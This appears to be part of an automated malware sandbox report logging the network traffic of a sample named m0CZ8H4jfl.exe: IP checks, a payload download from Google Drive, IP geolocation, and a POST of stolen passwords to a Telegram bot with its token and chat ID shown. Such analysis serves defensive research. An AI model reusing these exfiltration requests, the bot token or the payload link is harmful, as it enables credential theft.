                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        35192.168.2.950047193.122.6.168807628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        Jan 10, 2025 19:57:33.610366106 CET151OUTGET / HTTP/1.1
                                                                                                        User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                                                        Host: checkip.dyndns.org
                                                                                                        Connection: Keep-Alive
                                                                                                        Jan 10, 2025 19:57:37.391494036 CET273INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:57:37 GMT
                                                                                                        Content-Type: text/html
                                                                                                        Content-Length: 104
                                                                                                        Connection: keep-alive
                                                                                                        Cache-Control: no-cache
                                                                                                        Pragma: no-cache
                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                        Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.949973142.250.185.1104437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:18 UTC216OUTGET /uc?export=download&id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Host: drive.google.com
                                                                                                        Cache-Control: no-cache
                                                                                                        2025-01-10 18:56:18 UTC1920INHTTP/1.1 303 See Other
                                                                                                        Content-Type: application/binary
                                                                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                        Date: Fri, 10 Jan 2025 18:56:18 GMT
                                                                                                        Location: https://drive.usercontent.google.com/download?id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN&export=download
                                                                                                        Strict-Transport-Security: max-age=31536000
                                                                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Content-Security-Policy: script-src 'nonce-V58C6GLCS_GokrYWY_oDcA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                        Server: ESF
                                                                                                        Content-Length: 0
                                                                                                        X-XSS-Protection: 0
                                                                                                        X-Frame-Options: SAMEORIGIN
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.949974142.250.185.1614437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:19 UTC258OUTGET /download?id=1t3Ywt6vnH907sJTvu0e7Lz4I8WNHZFcN&export=download HTTP/1.1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                                        Cache-Control: no-cache
                                                                                                        Host: drive.usercontent.google.com
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:56:21 UTC4944INHTTP/1.1 200 OK
                                                                                                        X-GUploader-UploadID: AFiumC4uj4JuO_ma4ZEXGLphluCa6Ke50HAGJFAtg3_Ykq9mfpQTJVYUnSkLAYlhpMY7VUQGJRlJlI8
                                                                                                        Content-Type: application/octet-stream
                                                                                                        Content-Security-Policy: sandbox
                                                                                                        Content-Security-Policy: default-src 'none'
                                                                                                        Content-Security-Policy: frame-ancestors 'none'
                                                                                                        X-Content-Security-Policy: sandbox
                                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                                        Cross-Origin-Embedder-Policy: require-corp
                                                                                                        Cross-Origin-Resource-Policy: same-site
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        Content-Disposition: attachment; filename="tBXSTephqjgDGLq41.bin"
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Credentials: false
                                                                                                        Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                                                                                        Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                                                                                        Accept-Ranges: bytes
                                                                                                        Content-Length: 94272
                                                                                                        Last-Modified: Mon, 16 Dec 2024 08:45:39 GMT
                                                                                                        Date: Fri, 10 Jan 2025 18:56:21 GMT
                                                                                                        Expires: Fri, 10 Jan 2025 18:56:21 GMT
                                                                                                        Cache-Control: private, max-age=0
                                                                                                        X-Goog-Hash: crc32c=/iKvKQ==
                                                                                                        Server: UploadServer
                                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                        Connection: close
                                                                                                        2025-01-10 18:56:21 UTC4944INData Raw: 56 2b 19 ef 66 37 c7 e4 2a d2 99 ce 6c 99 86 54 ef 9b 6b 53 b3 a8 f9 c8 20 b4 c0 29 70 42 22 23 ef ea a9 69 10 3f ab 28 e1 a4 19 31 9e b4 6e 8e 4c 35 e9 71 aa f3 dd 2d 7c a2 a2 df ba c5 a3 54 20 1f 2b cb aa 48 5b a0 9f a0 db 3d 62 42 9b 1d 9b f7 6f dd 42 e5 1e 32 df 62 3c eb 06 f8 8a 0b 3d e4 0e 74 e4 11 fb dd 0e 18 72 c4 d1 e8 dd 6d 26 41 73 42 27 a8 86 51 2a 60 e9 ee 30 0c ae a5 4c 63 04 45 7e 65 b7 80 6c 3e 1f 8a 97 91 2f 48 b7 dc bd 13 62 89 09 9e bb 9a 86 2e b7 60 d9 47 63 1c 9d 40 39 b7 4a cf e5 85 1a 1d ea 24 8a d0 2b dc cb 9f 11 52 40 d9 1f a8 a0 51 c6 ab 52 21 9c 27 bf d8 70 91 aa 05 91 9e ea 36 85 c6 20 81 b5 e5 c4 f9 1d ee a2 53 76 b6 ba 62 8c d4 c2 81 1e 74 bb f7 bc 13 1d 5a 52 e3 c5 cb 38 07 23 c0 95 73 94 db b6 13 c8 05 86 6a 49 37 fd a3 93
                                                                                                        Data Ascii: V+f7*lTkS )pB"#i?(1nL5q-|T +H[=bBoB2b<=trm&AsB'Q*`0LcE~el>/Hb.`Gc@9J$+R@QR!'p6 SvbtZR8#sjI7
                                                                                                        2025-01-10 18:56:21 UTC4810INData Raw: ac 01 6a ee 10 8a 03 f1 c9 1d ec 80 90 7c 96 95 fd be ce 4f 68 27 60 48 e2 6f e5 cf 5a 02 ec bb d9 8d 18 18 4d 08 0a 5d 7c a7 61 cd a1 6f 5b 53 a9 c5 0c 4a 3b 7d 32 23 8e 01 b9 d6 cc 2b 59 fc 11 53 3e 62 ed ee 98 b6 14 86 d7 5e d0 16 91 42 7f 53 78 33 76 ae 79 73 7c 72 2d f6 91 a0 12 45 ee e5 28 a1 47 dd 67 67 4b 0b d1 0f ee 40 ff 95 70 90 62 bb a9 58 76 ca 34 18 23 14 5c dc e6 66 34 35 d7 ad 9e 9e bd 59 67 9f 12 0c 49 7a fd e7 4f 13 1d b1 20 0f fb f4 be b3 e1 91 84 d1 89 b2 3c a6 18 74 b9 fa 06 8e 87 db d4 ae 4b ab 28 b8 47 81 dd 1b ff b9 83 23 65 bf 49 2f 09 bb 73 ef 80 b9 e1 55 8d 1e 85 3d 43 bd 03 b6 bd 5c be e4 b6 51 c2 61 ab 09 ed 4b 1f 60 e3 6e c5 5e d1 7c 16 7b 62 86 19 97 0e 32 50 be 9c a2 6a 42 32 6c 3f ae 43 e8 c9 97 38 ae 8d e6 b8 3a a8 c5 c3
                                                                                                        Data Ascii: j|Oh'`HoZM]|ao[SJ;}2#+YS>b^BSx3vys|r-E(GggK@pbXv4#\f45YgIzO <tK(G#eI/sU=C\QaK`n^|{b2PjB2l?C8:
                                                                                                        2025-01-10 18:56:21 UTC1323INData Raw: 71 ad 0a a6 4c 96 3f 0e 0a 7e a1 93 49 87 9e 06 a8 aa 5f 67 f0 6e 47 e2 3a 52 7c f7 b1 a9 08 d2 4a 51 ca c8 84 07 ad 1c 31 aa 49 6e 1e 21 12 cb dc c0 5c cf 5d 96 6c 5f 49 5b cb 38 30 ff fb 6b 37 e4 ba b4 3a 89 1e 11 ea fa 6c 09 9d ba e9 b4 29 58 49 8a ae b6 3f 5b e5 57 d3 40 97 80 b0 d5 67 ba de 1c 7a c0 6a 04 50 14 a5 d5 5c 4d 74 f7 de e1 0f c5 1d 30 7c 07 b0 d8 eb fd d6 e1 09 c0 a2 07 7c df 2f f3 30 d9 c7 ad ee 95 73 81 df 74 ed f1 5b c7 d4 a4 ac 40 85 b3 d7 1d 2b 83 e3 43 bc 5d ca 30 13 70 41 97 70 87 87 7f 5f f3 73 0a 44 6a ad c5 46 11 b6 57 a6 ad 77 bd ee f1 04 35 2d 0d 85 07 4b 09 83 41 59 70 91 af 22 33 75 94 f4 86 ce 40 9b ac 4a eb 34 b2 56 61 c3 9e 35 5d 06 9c 6e d1 03 6a 68 d9 17 55 5e e8 19 5a 29 b8 f8 d5 30 32 89 e9 5b e8 92 e1 f4 4b d9 99 b8
                                                                                                        Data Ascii: qL?~I_gnG:R|JQ1In!\]l_I[80k7:l)XI?[W@gzjP\Mt0||/0st[@+C]0pAp_sDjFWw5-KAYp"3u@J4Va5]njhU^Z)02[K
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: 71 da ec df 1b ef 65 6e 48 94 3b d7 64 66 d3 bb 74 56 ee a4 87 ce 1c 08 34 6a 42 f2 9a 0c 2c 85 f7 b8 0a d9 a3 74 d1 c5 c3 13 ad 1c 3d 08 6e 77 e2 28 7a 86 ac 62 70 6d 5f ed 2b 4c 4d 21 ec e9 30 fb e0 12 53 aa ba b0 30 09 3b 11 ea fe 7f 2b 9d 92 ae b4 29 52 7e 8f bf a2 12 c8 40 1e c1 42 6d e8 ef d5 67 ab 99 49 7a c0 6a 0e 8a 07 8a c6 58 61 53 f4 b5 a7 0f c7 19 05 af 7d 27 d2 e4 fd d6 e3 72 91 92 0d 78 eb 7f f3 30 ff ef f9 ff 95 0a 53 d8 67 e2 eb 44 66 e6 a6 d7 0b a0 a5 a1 ff ed 83 93 eb 99 4a b8 d4 7d 38 31 35 51 e1 a6 7d 49 f9 2b fc 61 73 d5 d7 58 02 c0 e4 ac 95 69 bb 8f 34 95 35 29 24 73 11 35 dd 83 41 53 00 d0 f5 22 43 1e 35 a7 86 c4 e8 96 ef 34 35 3e bf 55 00 29 99 32 01 64 41 15 9d 09 c8 49 e9 ba 8b 5e e2 13 28 cd 85 f8 a5 44 dd 83 e9 7b 4b b7 f8 af
                                                                                                        Data Ascii: qenH;dftV4jB,t=nw(zbpm_+LM!0S0;+)R~@BmgIzjXaS}'rx0SgDfJ}815Q}I+asXi45)$s5AS"C545>U)2dAI^(D{K
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: c1 dd ff f1 1c 68 e8 ac a3 37 b1 dd 13 ea fa 6e 35 8e b7 e9 a7 27 49 63 f9 40 a7 3f 53 8d 1e c2 4e 82 f0 91 85 7d b0 86 27 91 c0 60 04 41 d1 ce 2b 58 61 73 e6 b5 b6 01 b7 4d 02 af 77 98 9c eb fd dc f0 63 9b b3 1e 0b 51 7c f3 3a c0 fd e8 fc fa 88 8a d8 6d 5f f3 4d fa ca b1 0d 1d 53 3e 8a 35 f8 82 f0 5d aa 4e df 40 8a 3d 41 e7 67 ef c5 6d 4e ed 4d 4f 57 05 55 c9 4e 08 96 57 b4 97 eb 9f 45 b9 04 35 d7 24 45 10 5a 14 90 58 48 6b c6 e5 34 20 69 ea 8c 83 ce 5d a0 e0 4a fa 2d a8 85 61 de 99 21 6a 33 a8 17 9d 03 7b 78 e0 df c4 41 c2 28 4d 38 86 e9 ce ba 1d fc c6 7f f8 86 f0 ca da c6 b5 46 16 24 f1 31 f9 b9 cb fb fa 90 d7 01 ff 39 e0 1a 21 9e e7 c2 09 c3 3d 35 44 88 f7 d0 d4 0b 4d f6 b0 59 ba c5 ac 5f fe 23 c6 26 f6 5e 5c 57 85 be 4a 4b 33 bf ef 56 b6 a9 cd e2 79
                                                                                                        Data Ascii: h7n5'Ic@?SN}'`A+XasMwcQ|:m_MS>5]N@=AgmNMOWUNWE5$EZXHk4 i]J-a!j3{xA(M8F$19!=5DMY_#&^\WJK3Vy
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: 15 fc dd e4 5e 8e b5 0d 53 a4 7c e5 3a f8 ef ff c4 95 79 91 e8 61 e8 f2 5f eb d9 97 d7 0a 94 b3 d1 47 30 98 e3 39 94 13 ca 32 62 33 57 1a 2d f9 d4 7e 53 fe 73 a6 44 6a ad df b0 03 bd 4f b3 84 6b ba b9 b0 10 26 2d 25 6e da 4b 03 83 41 2b 90 f1 e3 52 2d 02 13 a7 86 c4 4d 9b 02 4a eb 34 97 a4 72 c4 85 21 77 1a 98 7a 61 03 6a 66 e2 cc 7e 1d f3 11 35 57 92 f8 df 03 38 83 e9 7b fa 9b f0 d8 3f 44 88 b8 16 21 05 21 d8 d7 20 e8 e6 8b d8 19 f3 23 ee 2f c9 93 cb db 09 df 41 d5 55 9c ec dc 2a dc 89 f6 ba 3c a9 db bd 4b c4 56 ee e3 fc 52 56 7f cb af 42 2e a0 a9 9d be a0 a4 ac fc 74 67 9d c4 77 f9 76 88 fa 98 f2 d9 f9 9b b9 74 ea 39 87 e1 83 b4 d5 14 d8 d0 83 e2 1a bd 0d 78 d1 70 66 80 95 d4 d8 5f 5d 6f 61 31 ca aa 14 f0 92 4d e8 75 fe 2e 16 37 15 14 73 88 33 b7 29 4d
                                                                                                        Data Ascii: ^S|:ya_G092b3W-~SsDjOk&-%nKA+R-MJ4r!wzajf~5W8{?D!! #/AU*<KVRVB.tgwvt9xpf_]oa1Mu.7s3)M
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: 81 6a bf 95 b9 40 35 29 24 4d 37 4f 03 ff 40 59 72 d9 e3 22 22 71 f5 bb ae 16 4a b3 f2 38 cb 23 bf 2f 5a 8a 8f 32 7b 01 9e 13 b5 fb 6a 6c fb cf 52 67 a4 18 5a 29 94 8b 02 2b 02 85 e5 79 9b c8 fd d1 3b b6 5a b8 17 34 29 38 bd 6b dd e8 e0 96 11 01 e4 3e ee 24 e0 88 e6 c2 18 dd 3f 2c 27 f4 fa cb 35 4c 5c f6 b0 55 a4 d2 ac 46 9e 42 f2 e3 86 31 83 7f cb b8 59 45 28 b8 9a c6 2f b5 bd 81 36 02 43 d3 60 e2 06 88 ff b0 60 f5 f4 8c a2 09 ea 31 ab a3 ea 9d d6 15 d2 da 30 ee 95 d4 1c cd c3 ab 71 5c 30 19 d8 5f 5a 6f 6f 28 d8 af ed e7 89 c9 90 64 32 f8 71 24 1e 0f 78 a4 34 98 97 5b 40 91 18 58 44 70 8e 00 eb eb 5a 07 54 68 b3 89 25 67 21 3e fe b7 58 69 86 cb 44 23 58 db 6c 0d 1f ec 7c 4b c5 ff d6 fa 75 16 5d 6b b1 80 1a d9 86 a9 2a e0 4a aa f3 eb 57 77 24 51 c5 c3 fc
                                                                                                        Data Ascii: j@5)$M7O@Yr""qJ8#/Z2{jlRgZ)+y;Z4)8k>$?,'5L\UFB1YE(/6C``10q\0_Zoo(d2q$x4[@XDpZTh%g!>XiD#Xl|Ku]k*JWw$Q
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: 92 e1 d7 58 dc 99 bd 3f a1 0f 30 d4 ab d5 f9 ee ad 88 14 ca 2b fc 23 d2 f0 e3 c3 18 df 41 2e 54 9c ec e3 d1 23 89 f0 a3 5a b8 d3 a9 bf ed 2f e4 f2 fc 48 a8 7e d8 b5 5b 4a 0c bf b5 1e b3 a9 b7 e0 5c b8 1c d3 66 fb 12 90 d2 0d f3 f5 f2 99 b4 01 fb 39 ac c0 ec 9d 7f 14 d2 da 57 fb 93 a6 8a be c6 da 1e 83 18 8d de 30 03 7c 66 33 f9 07 13 e6 9c d0 84 6e 35 02 02 d5 10 1e 03 9e 0a 31 3d 5b 4a 8d f7 5e 3a 2a fc e2 e4 fa 23 39 e9 e9 b3 8f 3c 74 df 3d a1 8f 74 78 a2 4d 09 3e df ec 7d 0a 6c 55 76 39 53 84 03 8a d7 35 25 3d 13 a5 08 83 16 bc 2a 96 fb 8a ea eb 57 a7 e3 4e b7 f5 ff fb ef 08 01 76 14 cc 4d 23 d7 a2 3c 1a c9 32 63 66 c9 56 aa a5 a0 7e 43 ad 06 12 bd 3e 4a fc ea 59 ea b5 c7 85 84 45 ec 48 10 98 55 71 6a bc 83 9d b0 a6 5f fe 29 eb 15 69 27 a5 d7 6c c3 b6
                                                                                                        Data Ascii: X?0+#A.T#Z/H~[J\f9W0|f3n51=[J^:*#9<t=txM>}lUv9S5%=*WNvM#<2cfV~C>JYEHUqj_)i'l
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: 3c f1 59 dd 55 2d 65 e0 06 eb 18 9d f3 85 e2 a2 30 01 fb 33 91 1e ef ea c6 18 c3 dc 73 a7 89 59 29 a2 c6 ab 54 40 6a 6b cc 5f 2c de 43 2e d8 19 36 fe e8 ef 94 6e 54 a4 55 2e 04 1a d1 ad 38 c2 7b 4e 40 eb ab 78 30 3e 8b a2 c4 e6 21 e4 e3 68 c3 2d 1e c2 21 3e f4 8f 75 17 a1 61 44 27 43 de 55 44 6d 70 6a cb ba 90 03 fe 75 10 23 33 a6 56 03 f6 2b ae 3b e0 67 4f 0d 05 ac 05 c6 8a d5 96 c2 c8 9f aa 2e 7e 0b c9 c7 54 cb d0 18 e4 c9 42 eb 0f 75 56 aa af b3 73 3d b1 06 12 b9 78 46 d4 a4 33 eb bf 47 9a 84 45 e8 0c 10 89 53 7d 8c ab 84 f0 b6 b7 59 f3 c9 15 fb 96 38 b9 21 a4 e6 9e e9 1e 48 ea 1d 96 a8 d7 13 e0 9f f7 b4 c8 19 82 27 60 46 c1 e3 dc 89 51 02 32 b1 aa 53 34 1f 42 6b 03 2f 26 b1 61 61 10 ae 7e 7b 9c e3 04 2f fb 79 32 0d cb db aa da 07 2f 5c c4 06 52 3e 62
                                                                                                        Data Ascii: <YU-e03sY)T@jk_,C.6nTU.8{N@x0>!h-!>uaD'CUDmpju#3V+;gO.~TBuVs=xF3GES}Y8!H'`FQ2S4Bk/&aa~{/y2/\R>b
                                                                                                        2025-01-10 18:56:21 UTC1390INData Raw: b0 3d 51 53 95 09 75 79 2f 8e 0a 3f fa 53 05 80 74 b3 8f 36 62 21 3e ed 9c 78 69 f9 60 44 23 38 d2 7d 0a 7d 70 60 4b f1 90 03 fb 6e 20 36 34 cd 81 10 f1 09 a9 2a f7 59 b0 ef d2 8b 05 c6 5e b7 2a cf fb ef 82 6a 6d 05 c3 e5 06 cd f8 ea 3a c9 48 ca 49 50 10 ab af b3 75 4e 75 06 12 bf 23 4f a6 fe 45 ea cf 28 58 84 45 ee 6e 18 e6 81 66 bc a9 93 56 a4 b1 4f d3 ce 2d fd 97 27 a5 01 6d e1 ec 8b 70 7b b9 72 33 80 99 15 ed 9d ec b3 bc 4f 66 27 10 23 1f e4 e5 c9 43 06 3a a6 de f6 a8 03 44 17 64 88 7c ad 67 02 7a 6d 7b 53 09 c5 0c 46 3b 71 23 03 f0 42 bf f4 12 3d 5b f6 7e 57 3f 62 99 99 9d b7 10 fe a9 c1 d0 66 81 79 f7 42 71 2d 9e 51 6b 6a 68 69 3e 31 8b b2 19 54 e5 ba b2 89 ed d7 74 6b 4b 08 c0 4e ee 40 f1 f7 f4 b8 f7 b1 c6 d0 65 cf 3e 18 32 39 13 53 ce cc 3e 4b fc
                                                                                                        Data Ascii: =QSuy/?St6b!>xi`D#8}}p`Kn 64*Y^*jm:HIPuNu#OE(XEnfVO-'mp{r3Of'#C:Dd|gzm{SF;q#B=[~W?bfyBq-Qkjhi>1TtkKN@e>29S>K


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.949977104.21.96.14437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:24 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                        Host: reallyfreegeoip.org
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:56:25 UTC857INHTTP/1.1 200 OK
                                                                                                        Date: Fri, 10 Jan 2025 18:56:24 GMT
                                                                                                        Content-Type: text/xml
                                                                                                        Content-Length: 362
                                                                                                        Connection: close
                                                                                                        Age: 1850174
                                                                                                        Cache-Control: max-age=31536000
                                                                                                        cf-cache-status: HIT
                                                                                                        last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4yK9u6Mp%2FwGJVxKBykM0PquEE9Mdx06Cf6u6%2BN26Kkq0qqxc5o%2BsOxZqVxPMtwfEse0zsx1xeUh7yCQBEVxiocKROcD6Z9JlqSCkiYtJHyP%2BS65vzFLiiIrjU8mdICnWNxeBa17M"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8ffee30bde0d72a4-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2032&min_rtt=2001&rtt_var=813&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1295474&cwnd=212&unsent_bytes=0&cid=f7ea59a0f6be6474&ts=169&x=0"
                                                                                                        2025-01-10 18:56:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                        Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.949978149.154.167.2204437628C:\Users\user\Desktop\m0CZ8H4jfl.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-10 18:56:31 UTC294OUTPOST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1
                                                                                                        Content-Type: multipart/form-data; boundary================8dd317e95a26f14
                                                                                                        Host: api.telegram.org
                                                                                                        Content-Length: 1090
                                                                                                        Connection: Keep-Alive
                                                                                                        2025-01-10 18:56:31 UTC1090OUTData Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 31 37 65 39 35 61 32 36 66 31 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                                                                        Data Ascii: --===============8dd317e95a26f14Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
                                                                                                        2025-01-10 18:56:32 UTC388INHTTP/1.1 200 OK
                                                                                                        Server: nginx/1.18.0
                                                                                                        Date: Fri, 10 Jan 2025 18:56:32 GMT
                                                                                                        Content-Type: application/json
                                                                                                        Content-Length: 534
                                                                                                        Connection: close
                                                                                                        Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                        Access-Control-Allow-Origin: *
                                                                                                        Access-Control-Allow-Methods: GET, POST, OPTIONS
                                                                                                        Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
